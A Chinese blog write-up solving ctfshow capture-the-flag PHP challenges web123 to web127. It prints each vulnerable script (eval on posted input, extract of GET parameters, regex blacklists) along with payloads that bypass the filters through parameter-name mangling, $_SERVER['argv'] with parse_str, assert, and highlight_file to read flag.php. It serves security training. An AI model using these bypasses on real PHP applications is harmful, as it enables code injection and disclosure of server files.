ctfshow web123-127

已于 2022-02-08 22:56:38 修改
阅读量3k 收藏 1
点赞数 1
分类专栏: ctfshow 文章标签: web
于 2022-02-08 22:55:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akxnxbshai/article/details/122832893
版权

目录

Web 123

Web 125

Web 126

Web 127

Web 123

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
$a=$_SERVER['argv'];
$c=$_POST['fun'];
if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?/", $c)&&$c<=18){
         eval("$c".";");  
         if($fl0g==="flag_give_me"){
             echo $flag;
         }
    }
}
?>

方法一:

查看代码后发现$fl0g根本不能用所以用eval函数得到flag,

存在CTF_SHOW存在CTF_SHOW.COM不能存在fl0g

而且执行的是$c

所以我直接POST传入:

CTF_SHOW=&CTF_SHOW.COM=&fun=echo $flag

发现一直无法得到flag,仔细看了一下好像是因为传入的CTF_SHOW.COM中的点会被替换,上网查了如何绕过

在php中变量名只有数字字母下划线,被get或者post传入的变量名,如果含有空格、+、[则会被转化为_,所以按理来说我们构造不出CTF_SHOW.COM这个变量(因为含有.),但php中有个特性就是如果传入[,它被转化为_之后,后面的字符就会被保留下来不会被替换

payload:

CTF_SHOW=&CTF[SHOW.COM=&fun=echo $flag

方法二:

和125的情况一样,原理125已经解释过了。

Payload:

GET:?a=1+fl0g=flag_give_me

POST:CTF_SHOW=&CTF[SHOW.COM=&fun=parse_str($a[1])

Web 125

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
#
#
*/
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
$a=$_SERVER['argv'];
$c=$_POST['fun'];
if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?|flag|GLOBALS|echo|var_dump|print/i", $c)&&$c<=16){
         eval("$c".";");
         if($fl0g==="flag_give_me"){
             echo $flag;
         }
    }
}
?>

起初还以为是和上一题一样的,所以直接用了上一题的payload

但发现不成功,发现echo、flag等被禁用了

方法一:

用了highlight_file(),利用GET把fun要显示的文件变为由shell GET到的文件。

Payload:

GET:?shell=flag.php


POST:CTF_SHOW=&CTF[SHOW.COM=&fun=highlight_file($_GET[shell])

方法二:

利用$_SERVER['argv'],在大佬那看了这一函数的讲解。

$_SERVER 是一个包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组。这个数组中的项目由 Web 服务器创建。

'argv'

传递给该脚本的参数的数组。当脚本以命令行方式运行时,argv 变量传递给程序 C 语言样式的命令行参数。当通过 GET 方式调用时,该变量包含query string。

意思就是通过$_SERVER['argv']将$a变成数组,再利用数组的性质将fl0g=flag_give_me传入,同时还绕过第一个if中的!isset($_GET['fl0g'])),用+来进行分隔,使得数组中有多个数值。

执行eval函数也就是执行$c即是parse_str($a[1]),使得fl0g=flag_give_me,从而进入第三个if语句。

Payload:

GET:?a=1+fl0g=flag_give_me

POST:CTF_SHOW=&CTF[SHOW.COM=&fun=parse_str($a[1])

Web 126

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
#
#
*/
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
$a=$_SERVER['argv'];
$c=$_POST['fun'];
if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?|flag|GLOBALS|echo|var_dump|print|g|i|f|c|o|d/i"$c) && strlen($c)<=16){
         eval("$c".";");  
         if($fl0g==="flag_give_me"){
             echo $flag;
         }
    }
}

同web125

Payload:

GET:?a=1+fl0g=flag_give_me

POST:CTF_SHOW=&CTF[SHOW.COM=&fun=parse_str($a[1])

还有一个

payload:

GET:?$fl0g=flag_give_me

POST:CTF_SHOW=&CTF[SHOW.COM=&fun=assert($a[0])

Web 127

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-10-10 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-10 21:52:49

*/


error_reporting(0);
include("flag.php");
highlight_file(__FILE__);
$ctf_show = md5($flag);
$url = $_SERVER['QUERY_STRING'];


//特殊字符检测
function waf($url){
    if(preg_match('/\`|\~|\!|\@|\#|\^|\*|\(|\)|\\$|\_|\-|\+|\{|\;|\:|\[|\]|\}|\'|\"|\<|\,|\>|\.|\\\|\//', $url)){
        return true;
    }else{
        return false;
    }
}

if(waf($url)){
    die("嗯哼?");
}else{
    extract($_GET);
}


if($ctf_show==='ilove36d'){
    echo $flag;
}

方法一:

在web123就了解过,点或空格会被转化为下划线,由于点被过滤 ,所以可以用上空格。

Payload:

?ctf show=ilove36d

方法二:

$_SERVER['QUERY_STRING'];获取的查询语句是服务端还没url解码之前的字符串,所以对_进行一次url编码也能绕过。

Payload:?ctf%5fshow=ilove36d

f0njl
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
CTFshow命令执行29-123
qq_43534481的博客
08-06 1313
CTFshow命令执行WP
ctfshow--web入门(web101--web115&web123&web125-web133)
qing_chuan_的博客
06-08 851
v2$v3反射,通俗来讲就是可以通过一个对象来获取所属类的具体内容,php中内置了强大的反射API:ReflectionClass:一个反射类,功能十分强大,内置了各种获取类信息的方法,创建方式为new ReflectionClass(str 类名),可以用echo new ReflectionClass(‘className’)打印类的信息。ReflectionObject:另一个反射类,创建方式为new ReflectionObject(对象名)。
CTFshow web(php特性113-115&123
csjjjd的博客
02-05 2260
这道题目如果做不出来说明你文件包含那边学的不够好,可以看看我之前写的一篇文章,可以高效提升这方面的知识。这个函数通常用于处理用户输入的字符串,以确保不会因为开头或结尾的空白字符而导致不必要的问题。但是这里把convert搬了,那就不要转换器直接返璞归真。这里最主要有一个大漏洞,看到了就应该立刻反应过来了!echo "师傅们居然tql都是非预期 哼!这道题目没有禁用filter,那就直接拿下了。这里开始小小审计一下代码。
CTFSHOW 菜狗杯--WEB
weixin_45908624的博客
01-09 2797
CTFShow--菜狗杯--web
CTFshow web入门 爆破
m0_64180167的博客
07-27 593
输入账号密码 抓包 发现下面存在一个base64编码我输入的是 123 123发现就是base加密账号 密码那我们怎么通过intruder模块 自动变为 base64呢然后去payload------>custom iterator(自定义迭代器)位置1导入admin因为是 账号:密码 这个组合 所以位置2 选择 :位置3再一次导入字典选择编码 我们在下面的进行编码选择还有记得取消自动url编码然后直接开始就可以了。
CTFShow web入门123-150 (php特性(二))
lonmar的博客
12-05 4041
CTFSHOW PHP特性篇 web123-150
CTFshow php特性 web123
Kradress的博客
12-16 291
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: [email protected] # @link: https://ctfer.com */ error_reporting(0); highl
ctfshow php特性 web89-web115 web123-150wp
mumuzi的博客
02-01 4172
皮爱吃皮特性
CTFShow web1-7——CTF秀WEB模块解题思路
热门推荐
wangyuxiang946的博客
09-15 1万+
CTFShow WEB模块详细通关教程, 受篇幅所限, 通关教程分为上下两部分, 第一部分为1-7关, 第二部分为8-14关, 本篇博客为1-7关的通关教程, 从解题思路和所用到的知识点两个方面进行讲解 CTFShow web1-7关详细教程解题思路CTFShow web签到题CTFShow web2CTFShow web3CTFShow web4CTFShow web5CTFShow web6CTFShow web7知识点php://input伪协议日志注入MD5加密漏洞-0e绕过过滤空格的绕过方式 .
i春秋CTF训练 Web 123 常见的Web源码泄露漏洞 Burpsuite Intruder模块简单应用
椰奶冻不安全的博客
07-05 967
Web 123 常见的Web源码泄露漏洞 Burpsuite Intruder模块介绍 题目内容:12341234,然后就解开了 本题来自擂主C26 题目链接请在i春秋申请 login.php 源码里发现提示,用户名+出生年份就是密码,用zhangwei和zhangwei1999试了一下,没错当然登陆失败,只能再想办法了 常见的Web源码泄露漏洞 git源码泄露 Git是一个开源的分布式版本控制系统,每次执行初始化目录的时候会在当前目录下自动创建一个.git目录,用于记录代码的变更记录等 s
ctfshow-VIP题目-Web-详细解题思路
01-27
ctfshow-VIP题目-Web-详细解题思路
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web入门 php特性 web123--web139
最新发布
2301_81040377的博客
04-06 850
web133一样的东西但是我们的grep被过滤了,所以得思考一下怎么才行,但是反斜杠引号什么的没过滤,就可以用来绕过。拼接一下ctfshow{25b598bc-5a5b-4baf-a23e-2c4e9dea9d8f}必须传CTF_SHOW,CTF_SHOW.COM 不能有fl0g。就可以绕过对**isset($fl0g)**的判断,用+代表空格。先点击左边的获得域名,然后传参之后再点击右边的刷新结果。他这里对这个就讲的特别详细了,我抄一下。然后我们就可以进行类似的构造。就用argv的方法来写。
ctfshow学习记录-web入门(php特性109-115&123&125-126)
龟速更新的九某人
07-19 1193
ctfshow学习记录-web入门(php特性web109-115&web123&web125-126)
ctfshow web入门 PHP特性中篇(web105-web132)
ccfly1012的博客
09-11 1331
目录 web105 web106 web107 web108 web109 web110 web111 web112 web113 web114 web115 web123 web125 web126 web127 web128 web129 web130 web131 web132 web105 <?php ​ /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-16 1
CTFshow刷题日记-WEB-PHP特性(下篇123-150)
Love&Share
09-05 3293
web123,125,126 error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){ if(!preg_match("/\\\\|\/|\~|\`
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值